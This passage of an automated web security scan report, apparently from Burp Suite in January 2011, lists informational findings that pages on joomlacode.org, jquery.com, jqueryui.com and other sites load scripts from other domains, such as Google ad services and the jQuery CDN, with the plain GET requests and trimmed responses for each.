Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.276. http://joomlacode.org/gf/project/opengallery/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/opengallery/news/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/opengallery/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:37:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.277. http://joomlacode.org/gf/project/showplus/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/showplus/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/showplus/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:50:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.278. http://joomlacode.org/gf/project/spanish/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/spanish/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/spanish/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:51:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.279. http://joomlacode.org/gf/project/sportpool/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/sportpool/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/sportpool/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:44:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.280. http://joomlacode.org/gf/project/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/support/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/support/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:56:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14732


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.281. http://joomlacode.org/gf/project/virtuemart/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/virtuemart/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/virtuemart/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:54:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.282. http://joomlacode.org/gf/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/search/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/search/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:12:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.283. http://joomlacode.org/gf/snippet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/snippet/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/snippet/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:15:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.284. http://joomlacode.org/gf/user/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/user/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:09:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.285. http://joomlacode.org/gf/user/atrel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/user/atrel/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/atrel/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:09:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.286. http://joomlacode.org/gf/user/joodaterjoe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/user/joodaterjoe/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/joodaterjoe/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.287. http://joomlacode.org/gf/user/malkowitch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/user/malkowitch/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/malkowitch/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10915


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.288. http://joomlacode.org/gf/user/mattfaulds1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/user/mattfaulds1/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/mattfaulds1/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.289. http://joomlacode.org/gf/user/mikesamar/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/user/mikesamar/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/user/mikesamar/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:11:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10892


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.290. http://jquery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Jan 2011 23:10:28 GMT
ETag: "4960174-3eb0-7da86100"
Accept-Ranges: bytes
Content-Length: 16048
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

21.291. http://jquery.malsup.com/cycle/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.malsup.com
Path:   /cycle/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js
  • http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
  • http://malsup.github.com/chili-1.7.pack.js
  • http://malsup.github.com/jquery.easing.1.1.1.js
  • http://www.google-analytics.com/urchin.js

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:24:54 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 06 Apr 2010 00:35:14 GMT
ETag: "10cdf89-1f7c-483869e727480"
Accept-Ranges: bytes
Content-Length: 8060
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.1.1.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.292. http://jquery.org/license

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 24 Jan 2011 21:47:43 GMT
ETag: "3f80006-206a-8cb49dc0"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 22:43:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.293. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 14599

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

21.294. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
  • http://static.jquery.com/ui/themeroller/scripts/app.js

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

21.295. http://justinbieber.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://justinbieber.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: justinbieber.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 16:26:48 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.013036966323853
X-Served-In: 0.72553992271423
X-Served-By: ded2061
Content-Length: 42518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.296. http://keith-wood.name/bookmark.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://keith-wood.name
Path:   /bookmark.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /bookmark.html HTTP/1.1
Host: keith-wood.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:30:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 11 Dec 2010 02:05:21 GMT
ETag: "31d2b34-6fd8-e7371a40"
Accept-Ranges: bytes
Content-Length: 28632
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>jQuery Bookmark</t
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

21.297. http://kontentdesign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kontentdesign.com
Path:   /

Issue detail
